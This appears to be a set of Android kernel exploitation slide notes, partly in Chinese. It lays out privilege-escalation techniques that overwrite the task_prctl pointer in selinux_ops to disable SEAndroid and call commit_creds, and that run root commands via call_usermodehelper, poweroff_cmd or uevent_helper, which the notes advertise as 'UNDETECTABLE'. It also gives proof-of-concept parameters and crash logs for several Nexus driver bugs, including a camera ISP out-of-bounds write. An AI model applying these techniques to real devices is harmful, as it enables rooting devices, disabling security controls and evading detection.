
Proposing new kernel attack technique

Proposing new kernel attack technique

1.Search for callable function inside FPT structure (ptmx, securityops, defaultsecurity_ops)

2.User input has to be transferred without modification (intact) // 用户输入不能被修改,必须被完整的输入。

Select function pointer(within kernel) to call without ROP

1.taskprctl function pointer from selinuxops meets all criteria

2.user inputs were passed though without modification


SYSCALL_DEFINE5(prctl, int, option, unsigned long, arg2, unsigned long, arg3,
  unsigned long, arg4, unsigned long, arg5)
 struct task_struct *me = current;
 struct task_struct *tsk;
 unsigned char comm[sizeof(me->comm)];
 long error;

 error = security_task_prctl(option, arg2, arg3, arg4, arg5);
 if (error != -ENOSYS)
  return error;

 error = 0;

PXN bypass attack without ROP

When only partial memory value can be increased/decresed

CVE-2013-2094 perfeventopen

1.call resetsecurityops by increasing address of captaskprctl

2.call commit_creds

Direction Type Address                         Text                        
--------- ---- -------                         ----                        
Up        p    ____call_usermodehelper+130     BL              commit_creds
Up        p    set_current_groups+38           BL              commit_creds
Up        p    install_exec_creds+20           BL              commit_creds
Up        p    keyctl_change_reqkey_auth+50    BL              commit_creds
Up        p    keyctl_set_reqkey_keyring+98    BL              commit_creds
Up        p    join_session_keyring+90         BL              commit_creds
Up        p    join_session_keyring+118        BL              commit_creds
Up        p    lookup_user_key:loc_C0390D70    BL              commit_creds
Up        p    lookup_user_key+420             BL              commit_creds
Up        p    key_replace_session_keyring+1A0 BL              commit_creds
          p    cap_task_prctl+198              BL              commit_creds
Down      p    selinux_setprocattr+120         BL              commit_creds

int cap_task_prctl(int option, unsigned long arg2, unsigned long arg3,
     unsigned long arg4, unsigned long arg5)
 struct cred *new;
 long error = 0;

 new = prepare_creds();

 return commit_creds(new);

ROM:C0393754 cap_task_prctl
ROM:C0393754                 MOV             R12, SP
ROM:C0393758                 STMFD           SP!, {R3-R6,R11,R12,LR,PC}
ROM:C03938E8                 MOV             R0, R5
ROM:C03938EC                 BL              commit_creds

When we have total control over memory

CVE-2014-3153 futexrequeue CVE-2013-6282 get/putuser CVE-2015-0815 pipe

Change the value of taskprctl within selinuxops to kernel function address we want to call

1.Turn off SEAndroid and call commitcreds after calling preparekernel_cred

// change task_prctl within selinux_ops to address of reset_security_ops
syscall(172); /* 172 = sys_prctl *//* reset_security_ops() call */
// change task_prctl within selinux_ops to address of prepare_kernel_cred
cred_addr=syscall(172, 0); /* prepare_kernel_cred(0) call */
// change task_prctl within selinux_ops to address of commit_creds
syscall(172,cred_addr); /* commit_creds(cred_addr) call */

2.Calling taskprctl after overwriting its value to the address of commitcreds

// change task_prctl within selinux_ops to address of commit_creds
// we don’t need to call prepare_kernel_cred if we provide init_cred address as a parameter

3.We can indirectly call overridecreds function by calling taskprctl

// change task_prctl within selinux_ops to address of override_creds
void *cred_ptr=(void *)mmap(0x80000,0x100,...);
*(long *)&cred_ptr[0]=cred_addr;

kernel thread command execution

call_usermodehelper API

static inline int
call_usermodehelper(char *path, char **argv, char **envp, int wait)
 return call_usermodehelper_fns(path, argv, envp, wait,
           NULL, NULL, NULL);

static inline int
call_usermodehelper_fns(char *path, char **argv, char **envp, int wait,
   int (*init)(struct subprocess_info *info, struct cred *new),
   void (*cleanup)(struct subprocess_info *), void *data)
 struct subprocess_info *info;
 gfp_t gfp_mask = (wait == UMH_NO_WAIT) ? GFP_ATOMIC : GFP_KERNEL;

 // Set the argument, environment variables, handlers to run within kernel memory
 info = call_usermodehelper_setup(path, argv, envp, gfp_mask);

 if (info == NULL)
  return -ENOMEM;

 call_usermodehelper_setfns(info, init, cleanup, data);

 //  Register sub_info->work to khelper_wq queue
 return call_usermodehelper_exec(info, wait);

struct subprocess_info *call_usermodehelper_setup(char *path, char **argv,
        char **envp, gfp_t gfp_mask)
 INIT_WORK(&sub_info->work, __call_usermodehelper);

static void __call_usermodehelper(struct work_struct *work)
 if (wait == UMH_WAIT_PROC)
  pid = kernel_thread(wait_for_helper, sub_info,
  pid = kernel_thread(____call_usermodehelper, sub_info,

static int ____call_usermodehelper(void *data)
 retval = kernel_execve(sub_info->path,
          (const char *const *)sub_info->argv,
          (const char *const *)sub_info->envp);

// call do_execve function and execute user application
int kernel_execve(const char *filename,
    const char *const argv[],
    const char *const envp[])
 ret = do_execve(filename,
   (const char __user *const __user *)argv,
   (const char __user *const __user *)envp, &regs);

Bypassing PXN by calling call_usermodehelper

1.search for captaskprctl table address from security_ops structure

2.change captaskprctl value to resetsecurityops’s address

3.first calling prctl function will turn off SEAndroid

4.change captaskprctl value to call_usermodehelper’s address

5.second calling prctl function will run kernel thread command with admin priv

6.it runs as child process of kworker -> UNDETECTABLE

Kernel Protection bypass

use codes that indirectly call call_usermodehelper APIs

static int call_modprobe(char *module_name, int wait)
 static char *envp[] = {

 char **argv = kmalloc(sizeof(char *[5]), GFP_KERNEL);
 if (!argv)
  goto out;

 module_name = kstrdup(module_name, GFP_KERNEL);
 if (!module_name)
  goto free_argv;

 argv[0] = modprobe_path;
 argv[1] = "-q";
 argv[2] = "--";
 argv[3] = module_name; /* check free_modprobe_argv() */
 argv[4] = NULL;

 return call_usermodehelper_fns(modprobe_path, argv, envp,
  wait | UMH_KILLABLE, NULL, free_modprobe_argv, NULL);
 return -ENOMEM;

int orderly_poweroff(bool force)
 int argc;
 char **argv = argv_split(GFP_ATOMIC, poweroff_cmd, &argc);
 static char *envp[] = {
 info = call_usermodehelper_setup(argv[0], argv, envp, GFP_ATOMIC);
 if (info == NULL) {
  goto out;

 call_usermodehelper_setfns(info, NULL, argv_cleanup, NULL);

 ret = call_usermodehelper_exec(info, UMH_NO_WAIT);



Bypassing kernel protection by calling call_usermodehelper without parameters

1.orderly_poweroff seems to work pretty well

2.Bypassing kernel protection by calling call_usermodehelper indirectly

3.Change poweroff_cmd variable value to location of variable we want to run

4.Turn off SEAndroid and change whatever FPT to address of orderly_poweroff

5.At calling prctl, desired process will run as admin in kernel thread

6.it runs as child process of kworker -> UNDETECTABLE

the easiest kernel protection bypass

Bypassing kernel protection by overwriting uevent_helper

1.Hotplug is automatically run by kobjectuevnetenv function

2.we can execute commands by overwriting uevent_helper without changing ops structure

int kobject_uevent_env(struct kobject *kobj, enum kobject_action action,
         char *envp_ext[])
 // uevent_helper = CONFIG_UEVENT_HELPER_PATH = "/sbin/hotplug"
 argv [0] = uevent_helper;
 argv [1] = (char *)subsystem;
 argv [2] = NULL;
 retval = call_usermodehelper(argv[0], argv,
          env->envp, UMH_WAIT_EXEC);



About a month ago, when I was looking at the android kernle source code, I found a strange logic, it could trigger the device crash by bypassing the detection logic. I test it in Nexus 4 and the security patch level is 20161005.



Illegal access caused by an empty list. This problem is not repaired, I only test it in Nexus4 and Nexus5 with the security patch level 20161005. It will cause kernel panic.

static ssize_t  msm_bus_dbg_update_request_write(struct file *file,
 const char __user *ubuf, size_t cnt, loff_t *ppos)
 list_for_each_entry(cldata, &cl_list, list) {
  if (strstr(chid, cldata->pdata->name)) {
   cldata = cldata;
   strsep(&chid, " ");
   if (chid) {
    ret = strict_strtoul(chid, 10, &index);
    if (ret) {
     MSM_BUS_DBG("Index conversion"
      " failed\n");
     return -EFAULT;
   } else
    MSM_BUS_DBG("Error parsing input. Index not"
     " found\n");

 msm_bus_dbg_update_request(cldata, index);
 return cnt;




Linux内核 >= 2.6.22(2007年发行)以后的版本都受到影响,同时影响到android系统。





 static int is_ashmem_file(struct file *file)
-   char fname[256], *name;
-   name = dentry_path(file->f_dentry, fname, 256);
-   return strcmp(name, "/ashmem") ? 0 : 1;
+   return (file->f_op == &ashmem_fops);

dentry_path: 获取文件全路径,相对挂载点

shell@hammerhead:/ $ mount
rootfs / rootfs ro,seclabel,relatime 0 0
tmpfs /dev tmpfs rw,seclabel,nosuid,relatime,mode=755 0 0
devpts /dev/pts devpts rw,seclabel,relatime,mode=600 0 0
proc /proc proc rw,relatime 0 0
sysfs /sys sysfs rw,seclabel,relatime 0 0
selinuxfs /sys/fs/selinux selinuxfs rw,relatime 0 0
debugfs /sys/kernel/debug debugfs rw,relatime 0 0
none /acct cgroup rw,relatime,cpuacct 0 0
none /sys/fs/cgroup tmpfs rw,seclabel,relatime,mode=750,gid=1000 0 0
tmpfs /mnt/obb tmpfs rw,seclabel,relatime,mode=755,gid=1000 0 0
none /dev/cpuctl cgroup rw,relatime,cpu 0 0
/dev/block/platform/msm_sdcc.1/by-name/system /system ext4 ro,seclabel,relatime,data=ordered 0 0
/dev/block/platform/msm_sdcc.1/by-name/userdata /data ext4 rw,seclabel,nosuid,nodev,noatime,nomblk_io_submit,noauto_da_alloc,errors=panic,data=ordered 0 0


data, system, proc, /mnt/obb
/data/ashmem :  /ashmem
/data/local/tmp/ashmem: /local/tmp/ashmem
/mnt/obb/ashmem: /ashmem


fd_kgsl = open("/dev/kgsl-3d0", O_RDWR);
ioctl(fd_kgsl, IOCTL_KGSL_MAP_USER_MEM, &param);

crash log

 dev="proc" ino=10477 scontext=u:r:untrusted_app:s0 tcontext=u:r:radio:s0 tclass=dir
[  269.002841] Unable to handle kernel NULL pointer dereference at virtual address 00000114
[  269.003276] pgd = e9f24000
[  269.003497] [00000114] *pgd=33293831, *pte=00000000, *ppte=00000000
[  269.020211] Internal error: Oops: 17 [#1] PREEMPT SMP ARM
[  269.020398] CPU: 0    Not tainted  (3.4.0-gd59db4e #1)
[  269.020506] PC is at get_ashmem_file+0x78/0x154
[  269.020676] LR is at is_ashmem_file+0x3c/0x68
[  269.020772] pc : [<c078e704>]    lr : [<c078df24>]    psr: 20000013
[  269.020776] sp : eb73ddb8  ip : eb73dc98  fp : eb73de1c
[  269.021027] r10: 00000004  r9 : c10e9008  r8 : eb73de5c
[  269.021196] r7 : eb73de58  r6 : eb73de54  r5 : c103a488  r4 : ebbc9240
[  269.021291] r3 : 19761abc  r2 : 00000000  r1 : c0deb698  r0 : 00000000
[  269.021464] Flags: nzCv  IRQs on  FIQs on  Mode SVC_32  ISA ARM  Segment user
[  269.021560] Control: 10c5787d  Table: 3232406a  DAC: 00000015
[  269.021729]
[  269.021731] PC: 0xc078e684:
[  269.021906] e684  c011b554 c12a52b4 e1a0c00d e92ddff0 e24cb004 e24dd03c e52de004 e8bd4000
[  269.022856] e6a4  e59f511c e1a08003 e1a06001 e1a07002 e1a0a000 e5953000 e50b3030 ebeb5d64
[  269.023810] e6c4  e3a0c000 e586c000 e587c000 e2504000 0a000036 e59f90ec e1d931b2 e3130004
[  269.024684] e6e4  1a000018 e1a00004 ebfffdfd e3500000 0a00000d e594207c e3a00000 e5864000
[  269.025645] e704  e5923114 e5873000 e5923118 e5883000 e51b2030 e5953000 e1520003 1a000001
[  269.026609] e724  e24bd028 e89daff0 ebe81142 e1a0100a e59f0094 eb0a27bf e1a00004 ebeb5e68
[  269.027563] e744  e3e00000 eafffff1 e1a0200d e3c23d7f e3c3303f e24b0041 e593300c e593c224
[  269.028451] e764  e1a01003 e50bc048 ebeb6f73 e594300c e1a02006 e51bc048 e594e01c e5933020
[  269.029408]
[  269.029411] LR: 0xc078dea4:
[  269.029585] dea4  e594311c e5941118 e5902008 e0810003 e1500002 8afffff1 e1a00003 e3a02000
[  269.030541] dec4  e12fff36 e595300c e59301ec e2800038 ebe8ad33 e3a00000 e89da878 e3e00015
[  269.031501] dee4  e89da878 e1a0c00d e92dd810 e24cb004 e24ddf43 e52de004 e8bd4000 e59f4040
[  269.032466] df04  e3a02c01 e24b1f46 e590000c e5943000 e50b3018 ebebb5a7 e59f1028 ebf19143
[  269.033348] df24  e51b2018 e5943000 e2700001 33a00000 e1520003 1a000001 e24bd010 e89da810
[  269.034303] df44  ebe8133c c103a488 c0deb690 e1a0c00d e92ddff0 e24cb004 e24dd00c e52de004
[  269.035262] df64  e8bd4000 e5913004 e1a09001 e3530000 0a00003b e5913000 e3130080 0a00003c
[  269.036153] df84  e59f60f4 e286003c eb0a64db e3500000 0a000037 e5b64058 e1540006 e5945000
[  269.037106]
[  269.037108] SP: 0xeb73dd38:
[  269.037357] dd38  ebbc9300 ea7f67c0 eb73dd5c c078e704 20000013 ffffffff eb73dda4 eb73de5c
[  269.038229] dd58  c10e9008 00000004 eb73de1c eb73dd70 c0106e98 c010022c 00000000 c0deb698
[  269.039179] dd78  00000000 19761abc ebbc9240 c103a488 eb73de54 eb73de58 eb73de5c c10e9008
[  269.040129] dd98  00000004 eb73de1c eb73dc98 eb73ddb8 c078df24 c078e704 20000013 ffffffff
[  269.041004] ddb8  000080d0 c04aad10 0000005c c0a29194 eb73c000 c0a2925c eb73de0c c03f06e0
[  269.041953] ddd8  ec044ff8 c03f0780 eb73de0c eb73ddf0 c03f0780 19761abc ea461e00 eb73c000
[  269.042829] ddf8  00500000 ed2b0580 eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c eb73de20
[  269.043775] de18  c04ab018 c078e698 c027147c c026f070 eded7280 c026eeb0 eb73de6c 14104a1b
[  269.044652]
[  269.044654] IP: 0xeb73dc18:
[  269.044901] dc18  ec495100 c0278008 eb73dc64 eb73dc30 c0278bb4 c0277fd0 00000000 00000000
[  269.045780] dc38  00000028 00010000 c027c0ec c1034300 ec523480 eb73dc9c eb73de58 c027b63c
[  269.046749] dc58  eb73dc94 eb73dc68 c027b63c c0a29650 eb73dc84 00000100 c039bab0 00000000
[  269.047633] dc78  eb73dc94 c103a488 c103a488 eb73de54 eb73ddb4 00000017 eb73dd70 c104541c
[  269.048594] dc98  00000114 eb73de5c c10e9008 00000004 eb73dd6c eb73dcb8 c0100284 c0114744
[  269.049476] dcb8  00000000 ec523100 ec523680 00000000 ebbc90c0 ec6498c0 eb73dcec eb73dce0
[  269.050434] dcd8  c0a26edc c0a26d50 eb73dd1c eb73dcf0 c0384648 c0a26ed0 ec523124 00000000
[  269.051397] dcf8  eb73dd1c ebbc90c0 c12866f0 c103a488 ebbc9300 ea7f67c0 ebbc90d4 ebbc90d0
[  269.052351]
[  269.052353] FP: 0xeb73dd9c:
[  269.052527] dd9c  eb73de1c eb73dc98 eb73ddb8 c078df24 c078e704 20000013 ffffffff 000080d0
[  269.053480] ddbc  c04aad10 0000005c c0a29194 eb73c000 c0a2925c eb73de0c c03f06e0 ec044ff8
[  269.054363] dddc  c03f0780 eb73de0c eb73ddf0 c03f0780 19761abc ea461e00 eb73c000 00500000
[  269.055324] ddfc  ed2b0580 eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c eb73de20 c04ab018
[  269.056282] de1c  c078e698 c027147c c026f070 eded7280 c026eeb0 eb73de6c 14104a1b 00000008
[  269.057240] de3c  ed34ac20 00000020 eb73df60 00000004 eac28c00 eb73de90 ebbc9240 00000000
[  269.058119] de5c  00002000 eb73decc c01c0915 0000001c ea7f67c0 c103a488 c04aaccc eb73de94
[  269.059070] de7c  bed22a68 eb73df04 eb73de90 c04aa810 c04aacd8 ed59b6d0 00000004 00501000
[  269.060026]
[  269.060029] R1: 0xc0deb618:
[  269.060202] b618  613e363c 656d6873 69203a6d 6974696e 7a696c61 000a6465 2f766564 6d687361
[  269.061160] b638  002f6d65 2f766564 6d687361 00006d65 613e333c 656d6873 66203a6d 656c6961
[  269.062118] b658  6f742064 726e7520 73696765 20726574 6373696d 76656420 21656369 0000000a
[  269.063000] b678  613e363c 656d6873 75203a6d 616f6c6e 0a646564 00000000 6873612f 006d656d
[  269.063958] b698  613e333c 656d6873 25203a6d 72203a73 65757165 64657473 74616420 72662061
[  269.064909] b6b8  66206d6f 20656c69 63736564 74706972 7420726f 20746168 73656f64 2074276e
[  269.065797] b6d8  73697865 000a2e74 706c6966 20702520 76656472 20642520 20646970 25287525
[  269.066754] b6f8  66202973 20656c69 25287025 2029646c 20766564 203a6469 000a6425 663e333c
[  269.067710]
[  269.067713] R4: 0xebbc91c0:
[  269.067888] 91c0  00000000 00000000 ed3c8a00 00000000 00000000 00000000 00000000 00000000
[  269.068842] 91e0  00000000 00000000 ffffffff ffffffff 00000000 00000000 eb761dc0 eb761b00
[  269.069803] 9200  ebbc9200 ebbc9200 ebbc9208 ebbc9208 ed34d5f0 00000000 00000000 00000000
[  269.070680] 9220  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[  269.071635] 9240  ebbc9cc0 fefe1274 ed2f3e50 ec523480 c0b19540 00000000 00000000 00000002
[  269.072584] 9260  00020002 0000001f 00000000 00000000 00000000 00000000 00000000 00000000
[  269.073465] 9280  00000000 00000000 eaff1d00 00000000 00000000 00000000 00000000 00000020
[  269.074334] 92a0  00000000 00000000 ffffffff ffffffff 00000000 00000000 ea7f6800 00000000
[  269.075298]
[  269.075301] R5: 0xc103a408:
[  269.075477] a408  0fbd0b82 c561aad9 046a0e5f ceb6af04 90d34de8 5a0fecb3 a5d9c4e1 6f0565ba
[  269.076437] a428  31608756 fbbc260d 3ab7828b f06b23d0 ae0ec13c 64d26067 215c8068 4a3d3003
[  269.077396] a448  a02ec7d8 e2850203 a3c40529 c9478a99 5269f8b0 155b7d2b a6c55264 4fb78cab
[  269.078270] a468  db234dfd f3d3f258 c0dad457 449e4cdb 3c1e80d2 59791ef8 00000001 00000000
[  269.079152] a488  19761abc c010d028 ffffffff 00000009 0007b0d7 c0118560 c0118514 c01182c0
[  269.080109] a4a8  c011836c c0118384 c0118384 c0118388 c0118388 c0118404 c01184ec c01184fc
[  269.081061] a4c8  c011843c c0118484 c01184b8 00000022 ffffffff 00000000 fa002000 fa003000
[  269.082008] a4e8  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[  269.082886]
[  269.082888] R6: 0xeb73ddd4:
[  269.083137] ddd4  c03f06e0 ec044ff8 c03f0780 eb73de0c eb73ddf0 c03f0780 19761abc ea461e00
[  269.084019] ddf4  eb73c000 00500000 ed2b0580 eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c
[  269.084972] de14  eb73de20 c04ab018 c078e698 c027147c c026f070 eded7280 c026eeb0 eb73de6c
[  269.085926] de34  14104a1b 00000008 ed34ac20 00000020 eb73df60 00000004 eac28c00 eb73de90
[  269.086876] de54  ebbc9240 00000000 00002000 eb73decc c01c0915 0000001c ea7f67c0 c103a488
[  269.087752] de74  c04aaccc eb73de94 bed22a68 eb73df04 eb73de90 c04aa810 c04aacd8 ed59b6d0
[  269.088711] de94  00000004 00501000 00000000 00000000 00500000 00000001 00000000 00000009
[  269.089669] deb4  00000001 eb73c000 eb73df14 00000000 00000001 ed34ac20 eaff1d00 eb73defc
[  269.090551]
[  269.090554] R7: 0xeb73ddd8:
[  269.090803] ddd8  ec044ff8 c03f0780 eb73de0c eb73ddf0 c03f0780 19761abc ea461e00 eb73c000
[  269.091762] ddf8  00500000 ed2b0580 eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c eb73de20
[  269.092645] de18  c04ab018 c078e698 c027147c c026f070 eded7280 c026eeb0 eb73de6c 14104a1b
[  269.093604] de38  00000008 ed34ac20 00000020 eb73df60 00000004 eac28c00 eb73de90 ebbc9240
[  269.094559] de58  00000000 00002000 eb73decc c01c0915 0000001c ea7f67c0 c103a488 c04aaccc
[  269.095443] de78  eb73de94 bed22a68 eb73df04 eb73de90 c04aa810 c04aacd8 ed59b6d0 00000004
[  269.096406] de98  00501000 00000000 00000000 00500000 00000001 00000000 00000009 00000001
[  269.097364] deb8  eb73c000 eb73df14 00000000 00000001 ed34ac20 eaff1d00 eb73defc 19761abc
[  269.098314]
[  269.098316] R8: 0xeb73dddc:
[  269.098492] dddc  c03f0780 eb73de0c eb73ddf0 c03f0780 19761abc ea461e00 eb73c000 00500000
[  269.099442] ddfc  ed2b0580 eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c eb73de20 c04ab018
[  269.100320] de1c  c078e698 c027147c c026f070 eded7280 c026eeb0 eb73de6c 14104a1b 00000008
[  269.101272] de3c  ed34ac20 00000020 eb73df60 00000004 eac28c00 eb73de90 ebbc9240 00000000
[  269.102229] de5c  00002000 eb73decc c01c0915 0000001c ea7f67c0 c103a488 c04aaccc eb73de94
[  269.103183] de7c  bed22a68 eb73df04 eb73de90 c04aa810 c04aacd8 ed59b6d0 00000004 00501000
[  269.104066] de9c  00000000 00000000 00500000 00000001 00000000 00000009 00000001 eb73c000
[  269.105015] debc  eb73df14 00000000 00000001 ed34ac20 eaff1d00 eb73defc 19761abc c0398d0c
[  269.105967]
[  269.105969] R9: 0xc10e8f88:
[  269.106145] 8f88  0000002c 00000000 c0d4c634 c0babed4 c0de8d3c c0de8db4 00000033 00000000
[  269.107094] 8fa8  c0d4c634 c0babed4 c0de8d3c c0de8de0 0000003a 00000000 c0d4c634 c0babed4
[  269.108046] 8fc8  c0de8d3c c0de8e00 0000004b 00000000 c0de8ed0 c0babeec c0de8ed8 c0de8e1c
[  269.108925] 8fe8  0000001e 00000000 c0de8ed0 c0babeec c0de8ed8 c0de8e3c 00000026 00000000
[  269.109881] 9008  c0deb640 c0bac2e8 c0deb748 c0deb6e0 0000032c 00000000 c0deb640 c0bac2f8
[  269.110837] 9028  c0deb748 c0deb6e8 00000343 00000000 c0d06940 c0bac57c c0ded100 c0d6a0d0
[  269.111798] 9048  000000eb 00000000 c0d06940 c0bac5a8 c0ded100 c0debe08 0000043f 00000000
[  269.112684] 9068  c0d06940 c0bac5a8 c0ded100 c0debe28 00000441 00000000 c0d06940 c0bac5a8
[  269.113573] Process poc (pid: 3498, stack limit = 0xeb73c2f0)
[  269.113744] Stack: (0xeb73ddb8 to 0xeb73e000)
[  269.113841] dda0:                                                       000080d0 c04aad10
[  269.114015] ddc0: 0000005c c0a29194 eb73c000 c0a2925c eb73de0c c03f06e0 ec044ff8 c03f0780
[  269.114113] dde0: eb73de0c eb73ddf0 c03f0780 19761abc ea461e00 eb73c000 00500000 ed2b0580
[  269.114287] de00: eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c eb73de20 c04ab018 c078e698
[  269.114459] de20: c027147c c026f070 eded7280 c026eeb0 eb73de6c 14104a1b 00000008 ed34ac20
[  269.114633] de40: 00000020 eb73df60 00000004 eac28c00 eb73de90 ebbc9240 00000000 00002000
[  269.114733] de60: eb73decc c01c0915 0000001c ea7f67c0 c103a488 c04aaccc eb73de94 bed22a68
[  269.114907] de80: eb73df04 eb73de90 c04aa810 c04aacd8 ed59b6d0 00000004 00501000 00000000
[  269.115078] dea0: 00000000 00500000 00000001 00000000 00000009 00000001 eb73c000 eb73df14
[  269.115176] dec0: 00000000 00000001 ed34ac20 eaff1d00 eb73defc 19761abc c0398d0c 00000000
[  269.115349] dee0: ebbc9300 00000005 ebbc9300 bed22a68 ed34ac20 00000000 eb73df74 eb73df08
[  269.115522] df00: c02753ac c04aa5dc c0279324 00000000 00000000 00000001 00000000 ed59b6d0
[  269.115695] df20: ededee00 eb73df0c 00000005 00000000 bed22a68 c01c0915 ebbc9300 00000005
[  269.115792] df40: eb73c000 00000000 eb73df64 00000000 bed22a68 c01c0915 ebbc9300 00000005
[  269.115964] df60: eb73c000 00000000 eb73dfa4 eb73df78 c0275950 c0275324 ffffffff 00000000
[  269.116141] df80: c0107544 00000000 bed22a68 ffffffff 00000036 c0107544 00000000 eb73dfa8
[  269.116317] dfa0: c0107300 c02758e0 00000000 bed22a68 00000005 c01c0915 bed22a68 bed22a38
[  269.116414] dfc0: 00000000 bed22a68 ffffffff 00000036 000080f4 00000000 00000000 bed22aec
[  269.116589] dfe0: 00500000 bed22a28 0000e377 0001120c 80000010 00000005 00000000 00000000
[  269.116793] [<c078e704>] (get_ashmem_file+0x78/0x154) from [<c04ab018>] (kgsl_ioctl_map_user_mem+0x34c/0xa00)
[  269.116981] [<c04ab018>] (kgsl_ioctl_map_user_mem+0x34c/0xa00) from [<c04aa810>] (kgsl_ioctl+0x240/0x31c)
[  269.117088] [<c04aa810>] (kgsl_ioctl+0x240/0x31c) from [<c02753ac>] (do_vfs_ioctl+0x94/0x5bc)
[  269.117267] [<c02753ac>] (do_vfs_ioctl+0x94/0x5bc) from [<c0275950>] (sys_ioctl+0x7c/0x8c)
[  269.117453] [<c0275950>] (sys_ioctl+0x7c/0x8c) from [<c0107300>] (ret_fast_syscall+0x0/0x30)
[  269.117632] Code: 0a00000d e594207c e3a00000 e5864000 (e5923114)
[  269.121735] ---[ end trace 032dae055767b39f ]---
[  269.121877] Kernel panic - not syncing: Fatal exception
[  270.122308] Rebooting in 5 seconds..
[  275.123947] Going down for restart now
[  275.124870] Calling SCM to disable SPMI PMIC arbiter




diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
index 8e7cb68..86392c6 100644
--- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
@@ -1234,7 +1234,8 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
    case VFE_READ_DMI_16BIT:
    case VFE_READ_DMI_32BIT:
    case VFE_READ_DMI_64BIT: {
-       if (reg_cfg_cmd.cmd_type == VFE_WRITE_DMI_64BIT) {
+       if (reg_cfg_cmd.cmd_type == VFE_WRITE_DMI_64BIT ||
+           reg_cfg_cmd.cmd_type == VFE_READ_DMI_64BIT) {
            if ((reg_cfg_cmd.u.dmi_info.hi_tbl_offset <=
                reg_cfg_cmd.u.dmi_info.lo_tbl_offset) ||
                (reg_cfg_cmd.u.dmi_info.hi_tbl_offset -

source code

static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
    struct msm_vfe_reg_cfg_cmd *reg_cfg_cmd,
    uint32_t *cfg_data, uint32_t cmd_len)
    case VFE_READ_DMI_64BIT: {
        if (reg_cfg_cmd->cmd_type == VFE_WRITE_DMI_64BIT) {
            // check param...
        // check lo_tbl_offset
        if ((reg_cfg_cmd->u.dmi_info.lo_tbl_offset >
            (UINT_MAX - reg_cfg_cmd->u.dmi_info.len)) ||
            ((reg_cfg_cmd->u.dmi_info.lo_tbl_offset +
            reg_cfg_cmd->u.dmi_info.len) > cmd_len)) {
            pr_err("%s:%d lo_tbl_offset %d len %d cmd_len %d\n",
                __func__, __LINE__,
                reg_cfg_cmd->u.dmi_info.len, cmd_len);
            return -EINVAL;
    case VFE_READ_DMI_64BIT: {
        int i;
        uint32_t *hi_tbl_ptr = NULL, *lo_tbl_ptr = NULL;
        uint32_t hi_val, lo_val, lo_val1;
        if (reg_cfg_cmd->cmd_type == VFE_READ_DMI_64BIT) {
            hi_tbl_ptr = cfg_data +
        lo_tbl_ptr = cfg_data +
        if (reg_cfg_cmd->cmd_type == VFE_READ_DMI_64BIT)
            reg_cfg_cmd->u.dmi_info.len =
                reg_cfg_cmd->u.dmi_info.len / 2;
        for (i = 0; i < reg_cfg_cmd->u.dmi_info.len/4; i++) {
            lo_val = msm_camera_io_r(vfe_dev->vfe_base +
                    vfe_dev->hw_info->dmi_reg_offset + 0x4);
            if (reg_cfg_cmd->cmd_type == VFE_READ_DMI_16BIT) {
                lo_val1 = msm_camera_io_r(vfe_dev->vfe_base +
                    vfe_dev->hw_info->dmi_reg_offset + 0x4);
                lo_val |= lo_val1 << 16;
            *lo_tbl_ptr++ = lo_val;
            if (reg_cfg_cmd->cmd_type == VFE_READ_DMI_64BIT) {
                hi_val = msm_camera_io_r(vfe_dev->vfe_base +
                *hi_tbl_ptr = hi_val;    // !!!! hi_tbl_offset not check, so hi_tbl_ptr can be control~
                hi_tbl_ptr += 2;



need pass check:

if (
         ( reg_cfg_cmd[0].u.dmi_info.lo_tbl_offset > (UINT_MAX - reg_cfg_cmd[0].u.dmi_info.len) )
         || ( (reg_cfg_cmd[0].u.dmi_info.lo_tbl_offset + reg_cfg_cmd[0].u.dmi_info.len) > cmd_len )
        printf("[-] set param error: lo_tbl_offset 0x%x len 0x%x cmd_len 0x%x\n",
            reg_cfg_cmd[0].u.dmi_info.len, cmd_len);
        return -1;

then set hitbloffset = 0x40000000;

will be write a value to (kptr + hitbloffset /4)

crash log

[   66.742418] audit: audit_lost=10612 audit_rate_limit=20 audit_backlog_limit=64
[   66.742537] audit: rate limit exceeded
[   95.769933] Unable to handle kernel paging request at virtual address 2d7c3000
[   95.770933] pgd = e2800000
[   95.771331] [2d7c3000] *pgd=00000000
[   95.771760] Internal error: Oops: 805 [#1] PREEMPT SMP ARM
[   95.772189] CPU: 0    Not tainted  (3.4.0-gc46bfe8 #1)
[   95.772426] PC is at msm_isp_proc_cmd+0x534/0x8b4
[   95.772646] LR is at msm_isp_proc_cmd+0x52c/0x8b4
[   95.773035] pc : [<c07093b0>]    lr : [<c07093a8>]    psr: 60000013
[   95.773046] sp : eae83d70  ip : eae83d70  fp : eae83dc4
[   95.773624] r10: 00000001  r9 : ed7c3008  r8 : 00001dc8
[   95.773844] r7 : 00000000  r6 : ed658000  r5 : 2d7c3000  r4 : eb3c5ac0
[   95.774231] r3 : 00000080  r2 : ed7c3008  r1 : 00000009  r0 : 00000000
[   95.774456] Flags: nZCv  IRQs on  FIQs on  Mode SVC_32  ISA ARM  Segment user
[   95.774846] Control: 10c5787d  Table: 2ac0006a  DAC: 00000015
[   95.775228]
[   95.775234] PC: 0xc0709330:
[   95.775634] 9330  e1a00006 e59510c4 e2899001 e59330ec e2833004 e0811003 ebffb372 e5942008
[   95.777807] 9350  e1a0300a e1590122 2a000043 e594100c e3510004 e283a004 e5936000 1affffec
[   95.779820] 9370  e7953008 e6ff0076 e59510c4 e1a06826 e59330ec e2833004 e0811003 ebffb361
[   95.781969] 9390  eaffffe5 e7962008 e59600c4 e59220ec e0800002 ebffb36b e2892008 e1a09002
[   95.784122] 93b0  e4850008 e5941008 e15a0121 3affff5a e51b9030 e1a05006 e51b7048 e51b6038
[   95.786282] 93d0  e1d980b2 e1d920b0 eaffff99 e51b2038 e283a008 e795e008 e59510c4 e4920008
